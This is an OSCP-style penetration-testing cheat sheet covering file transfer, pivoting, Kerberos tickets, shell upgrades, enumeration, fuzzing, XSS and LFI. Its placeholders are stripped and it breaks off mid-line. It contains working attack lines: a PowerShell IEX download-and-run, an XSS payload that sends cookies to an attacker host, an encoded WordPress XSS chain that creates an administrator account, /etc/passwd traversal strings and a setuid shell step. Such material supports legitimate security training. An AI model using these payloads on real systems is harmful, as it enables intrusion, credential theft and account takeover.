| Hacking Articles | https://www.hackingarticles.in/ |

| Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ |

| OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP |

| OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 |

| IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |

| IppSec.rocks | https://ippsec.rocks/?# |

| 0xdf | https://0xdf.gitlab.io/ |

## Commands

### Basics

#### curl

```c

curl -v http://                                                        // verbose output

curl -X POST http://                                                   // use POST method

curl -X PUT http://                                                    // use PUT method

curl --path-as-is http:///../../../../../../etc/passwd                 // use --path-as-is to handle /../ or /./ in the given URL

curl --proxy http://127.0.0.1:8080                                             // use proxy

curl -F myFile=@ http://                                          // file upload

curl${IFS}/                                                       // Internal Field Separator (IFS) example

```

#### File Transfer

##### Certutil

```c

certutil -urlcache -split -f "http:///" 

```

##### Netcat

```c

nc -lnvp  < 

nc   > 

```

##### Impacket

```c

sudo impacket-smbserver  ./

sudo impacket-smbserver  . -smb2support

copy * \\\

```

##### PowerShell

```c

iwr / -o 

IEX(IWR http:///) -UseBasicParsing

powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\

```

##### Bash only

###### wget version

Paste directly to the shell.

```c

function __wget() {

    : ${DEBUG:=0}

    local URL=$1

    local tag="Connection: close"

    local mark=0

    if [ -z "${URL}" ]; then

        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \

               "${FUNCNAME[0]}" "${FUNCNAME[0]}"

        return 1;

    fi

    read proto server path <<<$(echo ${URL//// })

    DOC=/${path// //}

    HOST=${server//:*}

    PORT=${server//*:}

    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"

    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"

    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    exec 3<>/dev/tcp/${HOST}/$PORT

    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3

    while read line; do

        [[ $mark -eq 1 ]] && echo $line

        if [[ "${line}" =~ "${tag}" ]]; then

            mark=1

        fi

    done <&3

    exec 3>&-

}

```

```c

__wget http:///

```

###### curl version

```c

function __curl() {

  read proto server path <<<$(echo ${1//// })

  DOC=/${path// //}

  HOST=${server//:*}

  PORT=${server//*:}

  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT

  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3

  (while read line; do

   [[ "$line" == $'\r' ]] && break

  done && cat) <&3

  exec 3>&-

}

```

```c

__curl http:/// > 

```

#### FTP

```c

ftp 

ftp -A 

wget -r ftp://anonymous:anonymous@

```

#### Kerberos

```c

sudo apt-get install krb5-kdc

```

##### Ticket Handling

```c

impacket-getTGT /:''

export KRB5CCNAME=.ccache

export KRB5CCNAME='realpath .ccache'

```

##### Kerberos related Files

```c

/etc/krb5.conf                   // kerberos configuration file location

kinit                  // creating ticket request

klist                            // show available kerberos tickets

kdestroy                         // delete cached kerberos tickets

.k5login                         // resides kerberos principals for login (place in home directory)

krb5.keytab                      // "key table" file for one or more principals

kadmin                           // kerberos administration console

add_principal             // add a new user to a keytab file

ksu                              // executes a command with kerberos authentication

klist -k /etc/krb5.keytab        // lists keytab file

kadmin -p kadmin/ -k -t /etc/krb5.keytab    // enables editing of the keytab file

```

##### Ticket Conversion

###### kribi to ccache

```c

base64 -d .kirbi.b64 > .kirbi

impacket-ticketConverter .kirbi .ccache

export KRB5CCNAME=`realpath .ccache`

```

###### ccache to kirbi

```c

impacket-ticketConverter .ccache .kirbi

base64 -w0 .kirbi > .kirbi.base64

```

#### Ligolo-ng

> https://github.com/nicocha30/ligolo-ng

##### Download Proxy and Agent

```c

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

```

##### Prepare Tunnel Interface

```c

sudo ip tuntap add user $(whoami) mode tun ligolo

```

```c

sudo ip link set ligolo up

```

##### Setup Proxy on Attacker Machine

```c

./proxy -laddr :443 -selfcert

```

##### Setup Agent on Target Machine

```c

./agent -connect :443 -ignore-cert

```

##### Configure Session

```c

ligolo-ng » session

```

```c

[Agent : user@target] » ifconfig

```

```c

sudo ip r add 172.16.1.0/24 dev ligolo

```

```c

[Agent : user@target] » start

```

###### Port Forwarding

```c

[Agent : user@target] » listener_add --addr : --to : --tcp

```

#### Linux

##### CentOS

```c

doas -u  /bin/sh

```

##### Environment Variables

```c

export PATH=`pwd`:$PATH

```

##### gcc

```c

gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit

i686-w64-mingw32-gcc -o main32.exe main.c

x86_64-w64-mingw32-gcc -o main64.exe main.c

```

##### getfacl

```c

getfacl 

```

##### iconv

```c

echo "" | iconv -t UTF-16LE | base64 -w 0

echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

iconv -f ASCII -t UTF-16LE .txt | base64 | tr -d "\n"

```

##### vi

```c

:w !sudo tee %    # save file with elevated privileges without exiting

```

##### Windows Command Formatting

```c

echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

```

#### Microsoft Windows

##### dir

```c

dir /a

dir /a:d

dir /a:h

dir flag* /s /p

dir /s /b *.log

```

#### PHP Webserver

```c

sudo php -S 127.0.0.1:80

```

#### Ping

```c

ping -c 1 

ping -n 1 

```

#### Port Forwarding

##### Chisel

| System             | IP address     |

| ------------------ | -------------- |

| LHOST              | 192.168.50.10  |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER    | 10.10.100.20   |

| WINDOWS HOST       | 172.16.50.10   |

###### Reverse Pivot

- LHOST < APPLICATION SERVER

###### LHOST

```c

./chisel server -p 9002 -reverse -v

```

###### APPLICATION SERVER

```c

./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000

```

###### SOCKS5 / Proxychains Configuration

- LHOST > APPLICATION SERVER > NETWORK

###### LHOST

```c

./chisel server -p 9002 -reverse -v

```

###### APPLICATION SERVER

```c

./chisel client 192.168.50.10:9002 R:socks

```

##### Ligolo-ng

> https://github.com/nicocha30/ligolo-ng

| System             | IP address     |

| ------------------ | -------------- |

| LHOST              | 192.168.50.10  |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER    | 10.10.100.20   |

| WINDOWS HOST       | 172.16.50.10   |

- LHOST > APPLICATION SERVER > NETWORK

###### Download Proxy and Agent

> https://github.com/nicocha30/ligolo-ng/releases

```c

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz

```

###### Prepare Tunnel Interface

```c

sudo ip tuntap add user $(whoami) mode tun ligolo

```

```c

sudo ip link set ligolo up

```

###### Setup Proxy on LHOST

```c

./proxy -laddr 192.168.50.10:443 -selfcert

```

###### Setup Agent on APPLICATION SERVER

```c

./agent -connect 192.168.50.10:443 -ignore-cert

```

###### Configure Session

```c

ligolo-ng » session

```

```c

[Agent : user@target] » ifconfig

```

```c

sudo ip r add 172.16.50.0/24 dev ligolo

```

```c

[Agent : user@target] » start

```

###### Port Forwarding

- LHOST < APPLICATION SERVER > DATABASE SERVER

```c

[Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp

```

##### Socat

| System             | IP address     |

| ------------------ | -------------- |

| LHOST              | 192.168.50.10  |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER    | 10.10.100.20   |

| WINDOWS HOST       | 172.16.50.10   |

- LHOST > APPLICATION SERVER > DATABASE SERVER

###### APPLICATION SERVER

```c

ip a

ip r

socat -ddd TCP-LISTEN:2345,fork TCP::5432

```

###### LHOST

```c

psql -h  -p 2342 -U postgres

```

##### SSH Tunneling

###### Local Port Forwarding

| System | IP address |

| --- | --- |

| LHOST | 192.168.50.10 |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER | 10.10.100.20 |

| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### APPLICATION SERVER

```c

python3 -c 'import pty;pty.spawn("/bin/bash")'

ssh @192.168.100.10

ip a

ip r

for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445;

ssh -N -L 0.0.0.0:4455:172.16.50.10:445 @10.10.100.20

```

###### LHOST

```c

smbclient -p 4455 //172.16.50.10/ -U  --password=

```

###### Dynamic Port Forwarding

| System | IP address |

| --- | --- |

| LHOST | 192.168.50.10 |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER | 10.10.100.20 |

| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### APPLICATION SERVER

```c

python3 -c 'import pty;pty.spawn("/bin/bash")'

ssh -N -D 0.0.0.0:9999 @10.10.100.20

```

###### LHOST

```c

sudo ss -tulpn

tail /etc/proxychains4.conf

socks5 192.168.50.10 9999

proxychains smbclient -p 4455 //172.16.50.10/ -U  --password=

```

###### Remote Port Forwarding

| System | IP address |

| --- | --- |

| LHOST | 192.168.50.10 |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER | 10.10.100.20 |

| WINDOWS HOST | 172.16.50.10 |

- LHOST <-> FIREWALL <-> APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### LHOST

```c

sudo systemctl start ssh

sudo ss -tulpn

```

###### APPLICATION SERVER

```c

python3 -c 'import pty; pty.spawn("/bin/bash")'

ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 @192.168.50.10

```

###### LHOST

```c

psql -h 127.0.0.1 -p 2345 -U postgres

```

###### Remote Dynamic Port Forwarding

| System             | IP address     |

| ------------------ | -------------- |

| LHOST              | 192.168.50.10  |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER    | 10.10.100.20   |

| WINDOWS HOST       | 172.16.50.10   |

- LHOST < FIREWALL < APPLICATION SERVER > NETWORK

###### APPLICATION SERVER

```c

python3 -c 'import pty; pty.spawn("/bin/bash")'

ssh -N -R 9998 @192.168.50.10

```

###### LHOST

```c

sudo ss -tulpn

tail /etc/proxychains4.conf

socks5 127.0.0.1 9998

proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20

```

##### sshuttle

| System             | IP address     |

| ------------------ | -------------- |

| LHOST              | 192.168.50.10  |

| APPLICATION SERVER | 192.168.100.10 |

| DATABASE SERVER    | 10.10.100.20   |

| WINDOWS HOST       | 172.16.50.10   |

- LHOST > APPLICATION SERVER > NETWORK

###### APPLICATION SERVER

```c

socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22

```

###### LHOST

```c

sshuttle -r @192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24

smbclient -L //172.16.50.10/ -U  --password=

```

##### ssh.exe

| System              | IP address     |

| ------------------- | -------------- |

| LHOST               | 192.168.50.10  |

| APPLICATION SERVER  | 192.168.100.10 |

| WINDOWS JUMP SERVER | 192.168.100.20 |

| DATABASE SERVER     | 10.10.100.20   |

| WINDOWS HOST        | 172.16.50.10   |

- LHOST < FIREWALL < WINDOWS JUMP SERVER > NETWORK

###### LHOST

```c

sudo systemctl start ssh

xfreerdp /u: /p: /v:192.168.100.20

```

###### WINDOWS JUMP SERVER

```c

where ssh

C:\Windows\System32\OpenSSH\ssh.exe

C:\Windows\System32\OpenSSH> ssh -N -R 9998 @192.168.50.10

```

###### LHOST

```c

ss -tulpn

tail /etc/proxychains4.conf

socks5 127.0.0.1 9998

proxychains psql -h 10.10.100.20 -U postgres

```

##### Plink

| System              | IP address     |

| ------------------- | -------------- |

| LHOST               | 192.168.50.10  |

| APPLICATION SERVER  | 192.168.100.10 |

| WINDOWS JUMP SERVER | 192.168.100.20 |

| DATABASE SERVER     | 10.10.100.20   |

| WINDOWS HOST        | 172.16.50.10   |

- LHOST < FIREWALL < WINDOWS JUMP SERVER

###### LHOST

```c

find / -name plink.exe 2>/dev/null

/usr/share/windows-resources/binaries/plink.exe

```

###### WINDOWS JUMP SERVER

```c

plink.exe -ssh -l  -pw  -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10

```

###### LHOST

```c

ss -tulpn

xfreerdp /u: /p: /v:127.0.0.1:9833

```

##### Netsh

| System              | IP address     |

| ------------------- | -------------- |

| LHOST               | 192.168.50.10  |

| APPLICATION SERVER  | 192.168.100.10 |

| WINDOWS JUMP SERVER | 192.168.100.20 |

| DATABASE SERVER     | 10.10.100.20   |

| WINDOWS HOST        | 172.16.50.10   |

- LHOST < FIREWALL < WINDOWS JUMP SERVER > DATABASE SERVER

###### LHOST

```c

xfreerdp /u: /p: /v:192.168.100.20

```

###### WINDOWS JUMP SERVER

```c

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20

netstat -anp TCP | findstr "2222"

netsh interface portproxy show all

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow

```

###### LHOST

```c

sudo nmap -sS 192.168.50.10 -Pn -n -p2222

ssh [email protected] -p2222

```

###### WINDOWS JUMP SERVER

```c

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10

```

#### Python Webserver

```c

sudo python -m SimpleHTTPServer 80

sudo python3 -m http.server 80

```

#### RDP

```c

xfreerdp /v: /u: /p: /cert-ignore

xfreerdp /v: /u: /p: /d: /cert-ignore

xfreerdp /v: /u: /p: /dynamic-resolution +clipboard

xfreerdp /v: /u: /d: /pth:'' /dynamic-resolution +clipboard

xfreerdp /v: /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla

rdesktop 

```

#### showmount

```c

/usr/sbin/showmount -e 

sudo showmount -e 

chown root:root sid-shell; chmod +s sid-shell

```

#### SMB

```c

mount.cifs /// /mnt/remote

guestmount --add '//' --inspector --ro /mnt/ -v

```

#### smbclient

```c

smbclient -L \\\ -N

smbclient -L /// -N

smbclient -L ///// -N

smbclient -L //// -U %

smbclient -U "" -L \\\\\\

smbclient /// -U 

smbclient ///SYSVOL -U %

smbclient "\\\\\"

smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000

smbclient --no-pass ///

```

##### Download multiple files at once

```c

mask""

recurse ON

prompt OFF

mget *

```

#### SSH

```c

ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1

```

#### Time and Date

##### Get the Server Time

```c

sudo nmap -sU -p 123 --script ntp-info 

```

##### Stop virtualbox-guest-utils to stop syncing Time

```c

sudo /etc/init.d/virtualbox-guest-utils stop

```

##### Stop systemd-timesyncd to sync Time manually

```c

sudo systemctl stop systemd-timesyncd

```

##### Disable automatic Sync

```c

sudo systemctl disable --now chronyd

```

##### Options to set the Date and Time

```c

sudo net time -c 

sudo net time set -S 

sudo net time \\ /set /y

sudo ntpdate 

sudo ntpdate -s 

sudo ntpdate -b -u 

sudo timedatectl set-timezone UTC

sudo timedatectl list-timezones

sudo timedatectl set-timezone '/'

sudo timedatectl set-time 15:58:30

sudo timedatectl set-time '2015-11-20 16:14:50'

sudo timedatectl set-local-rtc 1

```

##### Keep in Sync with a Server

```c

while [ 1 ]; do sudo ntpdate ;done

```

#### Tmux

```c

ctrl b + w    # show windows

ctrl + "      # split window horizontal

ctrl + %      # split window vertical

ctrl + ,      # rename window

ctrl + {      # flip window

ctrl + }      # flip window

ctrl + spacebar    # switch pane layout

```

Copy & Paste

```c

:setw -g mode-keys vi

ctrl b + [

space

enter

ctrl b + ]

```

Search

```c

ctrl b + [    # enter copy

ctrl + /      # enter search while within copy mode for vi mode

n             # search next

shift + n     # reverse search

```

Logging

```c

ctrl b

shift + P    # start / stop

```

Save Output

```c

ctrl b + :

capture-pane -S -

ctrl b + :

save-buffer .txt

```

#### Upgrading Shells

```c

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl + z

stty raw -echo

fg

Enter

Enter

export XTERM=xterm

```

Alternatively:

```c

script -q /dev/null -c bash

/usr/bin/script -qc /bin/bash /dev/null

```

### Oneliner

```c

stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

```

#### Fixing Staircase Effect

```c

env reset

```

or

```c

stty onlcr

```

#### VirtualBox

```c

sudo pkill VBoxClient && VBoxClient --clipboard

```

#### virtualenv

```c

sudo apt-get install virtualenv

virtualenv -p python2.7 venv

. venv/bin/activate

```

```c

python.exe -m pip install virtualenv

python.exe -m virtualenv venv

venv\Scripts\activate

```

### Information Gathering

#### memcached

>  https://github.com/pd4d10/memcached-cli

```c

memcrashed / 11211/UDP

npm install -g memcached-cli

memcached-cli :@:11211

echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

STAT pid 21357

STAT uptime 41557034

STAT time 1519734962

sudo nmap  -p 11211 -sU -sS --script memcached-info

stats items

stats cachedump 1 0

get link

get file

get user

get passwd

get account

get username

get password

```

#### NetBIOS

```c

nbtscan 

nmblookup -A 

```

#### Nmap

```c

sudo nmap -A -T4 -sC -sV -p- 

sudo nmap -sV -sU 

sudo nmap -A -T4 -sC -sV --script vuln 

sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery 

sudo nmap -sC -sV -p- --scan-delay 5s 

sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' 

ls -lh /usr/share/nmap/scripts/*ssh*

locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb

```

#### Port Scanning

```c

for p in {1..65535}; do nc -vn  $p -w 1 -z & done 2> .txt

```

```c

export ip=; for port in $(seq 1 65535); do timeout 0.01 bash -c " /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

```

#### snmpwalk

```c

snmpwalk -c public -v1 

snmpwalk -v2c -c public  1.3.6.1.2.1.4.34.1.3

snmpwalk -v2c -c public  .1

snmpwalk -v2c -c public  nsExtendObjects

snmpwalk -c public -v1  1.3.6.1.4.1.77.1.2.25

snmpwalk -c public -v1  1.3.6.1.2.1.25.4.2.1.2

snmpwalk -c public -v1  .1.3.6.1.2.1.1.5

snmpwalk -c public -v1  1.3.6.1.4.1.77.1.2.3.1.1

snmpwalk -c public -v1  1.3.6.1.4.1.77.1.2.27

snmpwalk -c public -v1  1.3.6.1.2.1.6.13.1.3

snmpwalk -c public -v1  1.3.6.1.2.1.25.6.3.1.2

```

### Web Application Analysis

#### Burp Suite

```c

Ctrl+r          // Sending request to repeater

Ctrl+i          // Sending request to intruder

Ctrl+Shift+b    // base64 encoding

Ctrl+Shift+u    // URL decoding

```

#### Set Proxy Environment Variables

```c

export HTTP_PROXY=http://localhost:8080

export HTTPS_PROXY=https://localhost:8080

```

#### cadaver

```c

cadaver http:////

```

```c

dav://> cd C

dav://C/> ls

dav://C/> put 

```

#### Cross-Site Scripting (XSS)

```c

alert(1)

alert('XSS');

alert(document.cookies)

document.querySelector('#foobar-title').textContent = '<TEXT>'

fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));

user.changeEmail('user@domain');



```

##### XSS client-Side Attack

###### Request Example

```c

foobar!

```

###### Get nonce

```c

var ajaxRequest = new XMLHttpRequest();

var requestURL = "/wp-admin/user-new.php";

var nonceRegex = /ser" value="([^"]*?)"/g;

ajaxRequest.open("GET", requestURL, false);

ajaxRequest.send();

var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);

var nonce = nonceMatch[1];

```

###### Update Payload Script

```c

var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";

ajaxRequest = new XMLHttpRequest();

ajaxRequest.open("POST", requestURL, true);

ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

ajaxRequest.send(params);

```

###### Compress Payload Script

> https://jscompress.com/

```c

var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);

```

##### Encoding Function

```c

function encode_to_javascript(string) {

            var input = string

            var output = '';

            for(pos = 0; pos < input.length; pos++) {

                output += input.charCodeAt(pos);

                if(pos != (input.length - 1)) {

                    output += ",";

                }

            }

            return output;

        }

        

let encoded = encode_to_javascript('var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);')

console.log(encoded)

```

###### Encoded Payload

```c

118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9

```

###### Execution

```c

curl -i http:// --user-agent "eval(String.fromCharCode(118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9

))" --proxy 127.0.0.1:8080

```

#### ffuf

```c

ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs  -mc all

ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw  -mc all

ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs 185

ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http:///backups/backup_2020070416FUZZ.zip

```

##### API Fuzzing

```c

ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412

```

##### Searching for LFI

```c

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http:///admin../admin_staging/index.php?page=FUZZ -fs 15349

```

##### Fuzzing with PHP Session ID

```c

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt  -u "http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644

```

##### Recursion

```c

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/basic/FUZZ -recursion

```

##### File Extensions

```c

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log

```

##### Rate Limiting

```c

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429

```

##### Virtual Host Discovery

```c

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -fs 1495

```

##### Massive File Extension Discovery

```c

ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

```

#### GitTools

```c

./gitdumper.sh http:///.git/ /PATH/TO/FOLDER

./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

```

#### Gobuster

```c

-e    // extended mode that renders the full url

-k    // skip ssl certificate validation

-r    // follow cedirects

-s    // status codes

-b    // exclude status codes

-k            // ignore certificates

--wildcard    // set wildcard option

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:///

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x php

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200

$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://:/ -b 200 -k --wildcard

```

##### Common File Extensions

```c

txt,bak,php,html,js,asp,aspx

```

##### Common Picture Extensions

```c

png,jpg,jpeg,gif,bmp

```

##### POST Requests

```c

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http:///api/ -e -s 200

```

##### DNS Recon

```c

gobuster dns -d  -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

gobuster dns -d  -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

```

##### VHost Discovery

```c

gobuster vhost -u  -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

gobuster vhost -u  -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

```

##### Specifiy User Agent

```c

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux

```

#### Local File Inclusion (LFI)

```c

http:///.php?file=

http:///.php?file=../../../../../../../../etc/passwd

http:////php?file=../../../../../../../../../../etc/passwd

```

##### Until php 5.3

```c

http:////php?file=../../../../../../../../../../etc/passwd%00

```

##### Null Byte

```c

%00

0x00

```

##### Encoded Traversal Strings

```c

../

..\

..\/

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

%uff0e%uff0e%u2215

%uff0e%uff0e%u2216

..././

...\.\

```

##### php://filter Wrapper

> https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb

> https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

> https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

```c

url=php://filter/convert.base64-encode/resource=file:////var/www//api.php

```

```c

http:///index.php?page=php://filter/convert.base64-encode/resource=index

http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

base64 -d .php

```

##### Django, Rails, or Node.js Web Application Header Values

```c

Accept: ../../../../.././../../../../etc/passwd{{

